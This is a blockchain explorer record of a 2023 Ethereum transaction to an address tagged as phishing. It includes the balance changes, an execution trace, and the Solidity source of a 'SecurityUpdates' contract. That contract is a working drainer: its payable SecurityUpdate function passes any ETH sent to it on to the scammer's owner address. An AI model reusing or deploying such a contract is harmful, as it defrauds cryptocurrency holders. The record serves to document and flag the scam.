Transaction Hash:
Block:
17017039 at Apr-10-2023 09:53:59 AM +UTC
Transaction Fee:
0.001293715043518012 ETH
$3.38
Gas Used:
32,723 Gas / 39.535343444 Gwei
Account State Difference:
Address | Before | After | State Difference | ||
---|---|---|---|---|---|
0x1661F1B2...E5Eb23Ee3 | (Fake_Phishing66321) | 0.00012081565922397 Eth | 0.054337614571662472 Eth | 0.054216798912438502 | |
0x388C818C...7ccB19297
Miner
| (Lido: Execution Layer Rewards Vault) | 108.597297116396841099 Eth | 108.597870923085448416 Eth | 0.000573806688607317 | |
0xE7c9f04B...92a2C78AB |
0.069216798912438502 Eth
Nonce: 3
|
0.013706284956481988 Eth
Nonce: 4
| 0.055510513955956514 |
Execution Trace
ETH 0.054216798912438502
SecurityUpdates.CALL( )
- ETH 0.054216798912438502
Fake_Phishing66321.CALL( )
pragma solidity ^0.8.7; contract SecurityUpdates { address private owner; constructor() { owner = msg.sender; } function withdraw() public payable { require(msg.sender == owner, "Bro? Are you a stupid idiot?"); payable(msg.sender).transfer(address(this).balance); } function SecurityUpdate() public payable { if (msg.value > 0) payable(owner).transfer(address(this).balance); } }